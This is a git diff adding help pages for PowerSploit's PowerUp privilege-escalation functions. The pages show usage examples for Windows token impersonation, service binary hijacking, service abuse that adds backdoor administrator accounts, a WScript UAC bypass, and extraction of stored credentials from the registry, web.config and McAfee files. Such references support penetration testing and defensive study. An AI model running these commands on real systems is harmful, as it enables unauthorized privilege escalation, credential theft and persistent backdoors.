SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2600 + SeUndockPrivilege DISABLED 2600 +SeIncreaseWorkingSetPrivilege DISABLED 2600 + SeTimeZonePrivilege DISABLED 2600 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ProcessTokenPrivilege -Special +``` + +Privilege Attributes ProcessId +--------- ---------- --------- +SeSecurityPrivilege DISABLED 2444 +SeTakeOwnershipPrivilege DISABLED 2444 +SeBackupPrivilege DISABLED 2444 +SeRestorePrivilege DISABLED 2444 +SeSystemEnvironmentPriv... +DISABLED 2444 +SeImpersonatePrivilege ...T, SE_PRIVILEGE_ENABLED 2444 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-Process notepad | Get-ProcessTokenPrivilege | fl +``` + +Privilege : SeShutdownPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeChangeNotifyPrivilege +Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED +ProcessId : 2640 + +Privilege : SeUndockPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeIncreaseWorkingSetPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeTimeZonePrivilege +Attributes : DISABLED +ProcessId : 2640 + +## PARAMETERS + +### -Id +The process ID to enumerate token groups for, otherwise defaults to the current process. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: ProcessID + +Required: False +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Special +Switch. +Only return 'special' privileges, meaning admin-level privileges. +These include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, +SeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Privileged + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenGroup + +Outputs a custom object containing the token group (SID/attributes) for the specified token if +"-InformationClass 'Groups'" is passed. + +PowerUp.TokenPrivilege + +Outputs a custom object containing the token privilege (name/attributes) for the specified token if +"-InformationClass 'Privileges'" is passed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-RegistryAlwaysInstallElevated.md b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md new file mode 100755 index 00000000..ff48afc8 --- /dev/null +++ b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md @@ -0,0 +1,45 @@ +# Get-RegistryAlwaysInstallElevated + +## SYNOPSIS +Checks if any of the AlwaysInstallElevated registry keys are set. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-RegistryAlwaysInstallElevated +``` + +## DESCRIPTION +Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated +or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys +are set, $False otherwise. +If one of these keys are set, then all .MSI files run with +elevated permissions, regardless of current user permissions. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegistryAlwaysInstallElevated +``` + +Returns $True if any of the AlwaysInstallElevated registry keys are set. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Boolean + +$True if RegistryAlwaysInstallElevated is set, $False otherwise. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-RegistryAutoLogon.md b/docs/Privesc/Get-RegistryAutoLogon.md new file mode 100755 index 00000000..b93e75ca --- /dev/null +++ b/docs/Privesc/Get-RegistryAutoLogon.md @@ -0,0 +1,44 @@ +# Get-RegistryAutoLogon + +## SYNOPSIS +Finds any autologon credentials left in the registry. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-RegistryAutoLogon +``` + +## DESCRIPTION +Checks if any autologon accounts/credentials are set in a number of registry locations. +If they are, the credentials are extracted and returned as a custom PSObject. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegistryAutoLogon +``` + +Finds any autologon credentials left in the registry. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.RegistryAutoLogon + +Custom PSObject containing autologin credentials found in the registry. + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb) + diff --git a/docs/Privesc/Get-ServiceDetail.md b/docs/Privesc/Get-ServiceDetail.md new file mode 100755 index 00000000..ac758b01 --- /dev/null +++ b/docs/Privesc/Get-ServiceDetail.md @@ -0,0 +1,65 @@ +# Get-ServiceDetail + +## SYNOPSIS +Returns detailed information about a specified service by querying the +WMI win32_service class for the specified service name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ServiceDetail [-Name] +``` + +## DESCRIPTION +Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on +the pipeline object returned by Get-Service, extracts out the service name, queries the +WMI win32_service class for the specified service for details like binPath, and outputs +everything. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ServiceDetail -Name VulnSVC +``` + +Gets detailed information about the 'VulnSVC' service. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Get-ServiceDetail +``` + +Gets detailed information about the 'VulnSVC' service. + +## PARAMETERS + +### -Name +An array of one or more service names to query information for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.ManagementObject + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-SiteListPassword.md b/docs/Privesc/Get-SiteListPassword.md new file mode 100755 index 00000000..1ebbb5b2 --- /dev/null +++ b/docs/Privesc/Get-SiteListPassword.md @@ -0,0 +1,96 @@ +# Get-SiteListPassword + +## SYNOPSIS +Retrieves the plaintext passwords for found McAfee's SiteList.xml files. +Based on Jerome Nokin (@funoverip)'s Python solution (in links). + +Author: Jerome Nokin (@funoverip) +PowerShell Port: @harmj0y +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-SiteListPassword [[-Path] ] +``` + +## DESCRIPTION +Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\, +C:\Documents and Settings\, or C:\Users\. +For any files found, the appropriate +credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword +function that takes advantage of McAfee's static key encryption. +Any decrypted credentials +are output in custom objects. +See links for more information. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-SiteListPassword +``` + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : +Path : Products/CommonUpdater +Name : McAfeeHttp +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : +Server : update.nai.com:80 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Paris +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : paris001 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Tokyo +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : tokyo000 + +## PARAMETERS + +### -Path +Optional path to a SiteList.xml file or folder. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.SiteListPassword + +## NOTES + +## RELATED LINKS + +[https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ +https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ +https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ +https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ +https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf) + diff --git a/docs/Privesc/Get-System.md b/docs/Privesc/Get-System.md new file mode 100755 index 00000000..bcaf3d68 --- /dev/null +++ b/docs/Privesc/Get-System.md @@ -0,0 +1,172 @@ +# Get-System + +## SYNOPSIS +GetSystem functionality inspired by Meterpreter's getsystem. +'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create +a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege. +NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure +token duplication works correctly. + +PowerSploit Function: Get-System +Author: @harmj0y, @mattifestation +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### NamedPipe (Default) +``` +Get-System [-Technique ] [-ServiceName ] [-PipeName ] +``` + +### Token +``` +Get-System [-Technique ] +``` + +### RevToSelf +``` +Get-System [-RevToSelf] +``` + +### WhoAmI +``` +Get-System [-WhoAmI] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-System +``` + +Uses named impersonate to elevate the current thread token to SYSTEM. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-System -ServiceName 'PrivescSvc' -PipeName 'secret' +``` + +Uses named impersonate to elevate the current thread token to SYSTEM +with a custom service and pipe name. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-System -Technique Token +``` + +Uses token duplication to elevate the current thread token to SYSTEM. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-System -WhoAmI +``` + +Displays the credentials for the current thread. + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-System -RevToSelf +``` + +Reverts the current thread privileges. + +## PARAMETERS + +### -Technique +The technique to use, 'NamedPipe' or 'Token'. + +```yaml +Type: String +Parameter Sets: NamedPipe, Token +Aliases: + +Required: False +Position: Named +Default value: NamedPipe +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServiceName +The name of the service used with named pipe impersonation, defaults to 'TestSVC'. + +```yaml +Type: String +Parameter Sets: NamedPipe +Aliases: + +Required: False +Position: Named +Default value: TestSVC +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PipeName +The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'. + +```yaml +Type: String +Parameter Sets: NamedPipe +Aliases: + +Required: False +Position: Named +Default value: TestSVC +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RevToSelf +Reverts the current thread privileges. + +```yaml +Type: SwitchParameter +Parameter Sets: RevToSelf +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -WhoAmI +Switch. +Display the credentials for the current PowerShell thread. + +```yaml +Type: SwitchParameter +Parameter Sets: WhoAmI +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c +https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot +http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/](https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c +https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot +http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/) + diff --git a/docs/Privesc/Get-UnattendedInstallFile.md b/docs/Privesc/Get-UnattendedInstallFile.md new file mode 100755 index 00000000..89275200 --- /dev/null +++ b/docs/Privesc/Get-UnattendedInstallFile.md @@ -0,0 +1,44 @@ +# Get-UnattendedInstallFile + +## SYNOPSIS +Checks several locations for remaining unattended installation files, +which may have deployment credentials. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-UnattendedInstallFile +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-UnattendedInstallFile +``` + +Finds any remaining unattended installation files. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.UnattendedInstallFile + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + +[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) + diff --git a/docs/Privesc/Get-UnquotedService.md b/docs/Privesc/Get-UnquotedService.md new file mode 100755 index 00000000..4b613557 --- /dev/null +++ b/docs/Privesc/Get-UnquotedService.md @@ -0,0 +1,45 @@ +# Get-UnquotedService + +## SYNOPSIS +Get-UnquotedService Returns the name and binary path for services with unquoted paths +that also have a space in the name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission + +## SYNTAX + +``` +Get-UnquotedService +``` + +## DESCRIPTION +Uses Get-WmiObject to query all win32_service objects and extract out +the binary pathname for each. +Then checks if any binary paths have a space +and aren't quoted. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-UnquotedService +``` + +Get a set of potentially exploitable services. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.UnquotedService + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb) + diff --git a/docs/Privesc/Get-WebConfig.md b/docs/Privesc/Get-WebConfig.md new file mode 100755 index 00000000..78cef7d1 --- /dev/null +++ b/docs/Privesc/Get-WebConfig.md @@ -0,0 +1,93 @@ +# Get-WebConfig + +## SYNOPSIS +This script will recover cleartext and encrypted connection strings from all web.config +files on the system. +Also, it will decrypt them if needed. + +Author: Scott Sutherland, Antti Rantasaari +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WebConfig +``` + +## DESCRIPTION +This script will identify all of the web.config files on the system and recover the +connection strings used to support authentication to backend databases. +If needed, the +script will also decrypt the connection strings on the fly. +The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Return a list of cleartext and decrypted connect strings from web.config files. +``` + +Get-WebConfig + +user : s1admin +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\test2 +path : C:\test2\web.config +encr : No + +user : s1user +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\inetpub\wwwroot +path : C:\inetpub\wwwroot\web.config +encr : Yes + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Return a list of clear text and decrypted connect strings from web.config files. +``` + +Get-WebConfig | Format-Table -Autosize + +user pass dbserv vdir path encr +---- ---- ------ ---- ---- ---- +s1admin s1password 192.168.1.101\server1 C:\App1 C:\App1\web.config No +s1user s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\test\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\web.config Yes +s3user s3password 192.168.1.103\server3 D:\App3 D:\App3\web.config No + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Boolean + +System.Data.DataTable + +## NOTES +Below is an alterantive method for grabbing connection strings, but it doesn't support decryption. +for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings + +Author: Scott Sutherland - 2014, NetSPI +Author: Antti Rantasaari - 2014, NetSPI + +## RELATED LINKS + +[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx) + diff --git a/docs/Privesc/Install-ServiceBinary.md b/docs/Privesc/Install-ServiceBinary.md new file mode 100755 index 00000000..bc75a2ae --- /dev/null +++ b/docs/Privesc/Install-ServiceBinary.md @@ -0,0 +1,175 @@ +# Install-ServiceBinary + +## SYNOPSIS +Replaces the service binary for the specified service with one that executes +a specified command as SYSTEM. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary + +## SYNTAX + +``` +Install-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ] + [-Credential ] [-Command ] +``` + +## DESCRIPTION +Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the +current user can modify the associated service binary listed in the binPath. +Backs up +the original service binary to "OriginalService.exe.bak" in service binary location, +and then uses Write-ServiceBinary to create a C# service binary that either adds +a local administrator user or executes a custom command. +The new service binary is +replaced in the original service binary path, and a custom object is returned that +captures the original and new service binary configuration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Install-ServiceBinary +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds TESTLAB\john to the Administrators local group. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (backdoor/Password123!). + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Install-ServiceBinary -Name VulnSVC -Command "net ..." +``` + +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that executes a custom command. + +## PARAMETERS + +### -Name +The service name the EXE will be running under. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.ServiceBinary.Installed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Invoke-PrivescAudit.md b/docs/Privesc/Invoke-PrivescAudit.md new file mode 100755 index 00000000..71109626 --- /dev/null +++ b/docs/Privesc/Invoke-PrivescAudit.md @@ -0,0 +1,63 @@ +# Invoke-PrivescAudit + +## SYNOPSIS +Executes all functions that check for various Windows privilege escalation opportunities. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Invoke-PrivescAudit [-HTMLReport] +``` + +## DESCRIPTION +Executes all functions that check for various Windows privilege escalation opportunities. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-PrivescAudit +``` + +Runs all escalation checks and outputs a status report for discovered issues. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-PrivescAudit -HTMLReport +``` + +Runs all escalation checks and outputs a status report to SYSTEM.username.html +detailing any discovered issues. + +## PARAMETERS + +### -HTMLReport +Switch. +Write a HTML version of the report to SYSTEM.username.html. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.String + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Invoke-ServiceAbuse.md b/docs/Privesc/Invoke-ServiceAbuse.md new file mode 100755 index 00000000..8d493d7a --- /dev/null +++ b/docs/Privesc/Invoke-ServiceAbuse.md @@ -0,0 +1,194 @@ +# Invoke-ServiceAbuse + +## SYNOPSIS +Abuses a function the current user has configuration rights on in order +to add a local administrator or execute a custom command. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath + +## SYNTAX + +``` +Invoke-ServiceAbuse [-Name] [-UserName ] [-Password ] [-LocalGroup ] + [-Credential ] [-Command ] [-Force] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current +user has configuration modification rights on and executes a series of automated actions to +execute commands as SYSTEM. +First, the service is enabled if it was set as disabled and the +original service binary path and configuration state are preserved. +Then the service is stopped +and the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a +series of commands, the service is started, stopped, and the next command is configured. +After +completion, the original service configuration is restored and a custom object is returned +that captures the service abused and commands run. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC +``` + +Abuses service 'VulnSVC' to add a localuser "john" with password +"Password123! +to the machine and local administrator group + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Invoke-ServiceAbuse +``` + +Abuses service 'VulnSVC' to add a localuser "john" with password +"Password123! +to the machine and local administrator group + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john" +``` + +Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the +local adminisrtators group. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users" +``` + +Abuses service 'VulnSVC' to add a localuser "backdoor" with password +"password" to the machine and local "Power Users" group + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC -Command "net ..." +``` + +Abuses service 'VulnSVC' to execute a custom command. + +## PARAMETERS + +### -Name +An array of one or more service names to abuse. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Force +Switch. +Force service stopping, even if other services are dependent. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.AbusedService + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Invoke-WScriptUACBypass.md b/docs/Privesc/Invoke-WScriptUACBypass.md new file mode 100755 index 00000000..f9eeb8d3 --- /dev/null +++ b/docs/Privesc/Invoke-WScriptUACBypass.md @@ -0,0 +1,85 @@ +# Invoke-WScriptUACBypass + +## SYNOPSIS +Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. + +Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Invoke-WScriptUACBypass [-Command] [-WindowStyle ] +``` + +## DESCRIPTION +Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute +VBScript using the wscript executable with the new manifest. +The VBScript executed by +C:\Windows\wscript.exe will run elevated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +" +``` + +Launches the specified PowerShell encoded command in high-integrity. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible' +``` + +Spawns a high integrity cmd.exe. + +## PARAMETERS + +### -Command +The shell command you want wscript.exe to run elevated. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CMD + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -WindowStyle +Whether to display or hide the window for the executed '-Command X'. +Accepted values are 'Hidden' and 'Normal'/'Visible. +Default is 'Hidden'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Hidden +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html +https://github.com/Vozzie/uacscript +https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html +https://github.com/Vozzie/uacscript +https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1) + diff --git a/docs/Privesc/Restore-ServiceBinary.md b/docs/Privesc/Restore-ServiceBinary.md new file mode 100755 index 00000000..a88fc297 --- /dev/null +++ b/docs/Privesc/Restore-ServiceBinary.md @@ -0,0 +1,87 @@ +# Restore-ServiceBinary + +## SYNOPSIS +Restores a service binary backed up by Install-ServiceBinary. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath + +## SYNTAX + +``` +Restore-ServiceBinary [-Name] [[-BackupPath] ] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline and +checks for the existence of an "OriginalServiceBinary.exe.bak" in the service +binary location. +If it exists, the backup binary is restored to the original +binary path. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Restore-ServiceBinary -Name VulnSVC +``` + +Restore the original binary for the service 'VulnSVC'. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Restore-ServiceBinary +``` + +Restore the original binary for the service 'VulnSVC'. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe' +``` + +Restore the original binary for the service 'VulnSVC' from a custom location. + +## PARAMETERS + +### -Name +The service name to restore a binary for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -BackupPath +Optional manual path to the backup binary. + 